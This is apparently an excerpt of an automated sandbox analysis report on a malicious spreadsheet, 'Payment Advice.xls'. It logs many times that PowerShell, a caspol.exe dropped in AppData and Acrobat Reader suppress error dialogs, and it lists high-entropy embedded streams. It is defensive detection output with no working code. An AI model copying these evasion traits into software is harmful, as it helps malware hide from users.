                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: Payment Advice.xlsStream path 'MBD001C4526/Package' entropy: 7.99631060239 (max. 8.0)
                    Source: Payment Advice.xlsStream path 'Workbook' entropy: 7.99861998161 (max. 8.0)
                    Source: ~DF6CCF4596F2406470.TMP.0.drStream path 'Package' entropy: 7.9944184592 (max. 8.0)
                    Source: CA430000.0.drStream path 'MBD001C4526/Package' entropy: 7.9944184592 (max. 8.0)
